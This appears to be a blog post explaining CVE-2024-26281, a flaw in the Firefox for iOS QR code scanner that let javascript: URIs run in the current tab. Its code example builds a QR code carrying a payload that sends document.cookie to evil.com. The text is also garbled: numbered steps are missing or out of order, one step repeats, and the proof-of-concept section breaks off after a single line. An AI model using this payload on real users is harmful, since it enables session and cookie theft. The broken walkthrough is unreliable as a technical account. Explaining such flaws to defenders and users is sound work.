CVE-2024-26281 - How a QR Code Scanner Flaw in Firefox for iOS (< 123) Let Attackers Run Malicious JavaScript

In early 2024, a critical security flaw—CVE-2024-26281—was uncovered in Firefox for iOS versions below 123. This bug allowed attackers to inject and run malicious JavaScript on a user's currently-open website simply by scanning a specially crafted QR code with the browser’s built-in QR code scanner.

This post breaks down the vulnerability, how it works, includes code examples, and covers exploit details in plain language.

The Issue in a Nutshell

Let’s say you use Firefox for iOS. If you scan a QR code with a JavaScript-based URI (like javascript:alert(document.domain)), this flaw could make your browser execute the code in the context of whatever site you already had open. Normally, browsers try to stop this for security. But this bug bypassed that protection—allowing full script execution, leading to things like cookie theft, phishing, and other attacks.

Technical Details

When you scan a QR code, Firefox for iOS should validate any links before opening them, especially if they’re JavaScript URIs. The browser was supposed to prevent javascript: schemes from running unless strictly necessary.

But in versions before 123, the QR code scanner would take any URL—even one starting with javascript:—and let it execute in the context of the current open tab. No checks, no warnings.

Victim scans the QR code using Firefox for iOS’ QR code scanner.

3. Browser runs the script—not in a blank page, but on whatever site the user had open. If you were signed into sensitive sites (bank, email), the script could access your session.

Here’s how attackers might generate a payload QR code

// Example QR code payload
const maliciousUri = "javascript:fetch('https://evil.com/steal?cookie='+document.cookie)";

// Use any online tool or library like qrcode.js to create the QR code:
QRCode.toDataURL(maliciousUri, function (err, url) {
  console.log(url); // This is the QR code, ready to print or display
});

Victim uses the Firefox QR code scanner (not just the camera app) to scan the malicious QR code.

4. Script executes in the open tab’s context, stealing cookies, taking screenshots, or changing content.

Proof-of-Concept Demo

This is an exclusive simple proof-of-concept. Do not use this for anything illegal or on anyone but yourself.

1. Visit https://www.qr-code-generator.com/ (external site).

Update your Firefox for iOS to version 123 or later.

App Store - Firefox Browser

Don’t scan QR codes from untrusted sources.

- Browser makers: Always strip or strictly validate potentially dangerous URI schemes from QR code handlers or url parsers.

References

- Mozilla Security Advisory 2024-0003
- NIST National Vulnerability Database: CVE-2024-26281
- Security Blog: QR Codes and Browser Attacks
- Firefox for iOS Release Notes

Final Thoughts

CVE-2024-26281 shows even simple features like a QR code scanner can open the door to powerful attacks if not properly sandboxed. If you’re a developer, always treat all user inputs as potentially dangerous—especially when they have access to “execute code” features.

Update your apps regularly, and stay safe out there!

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 11/20/2024 17:35:24 UTC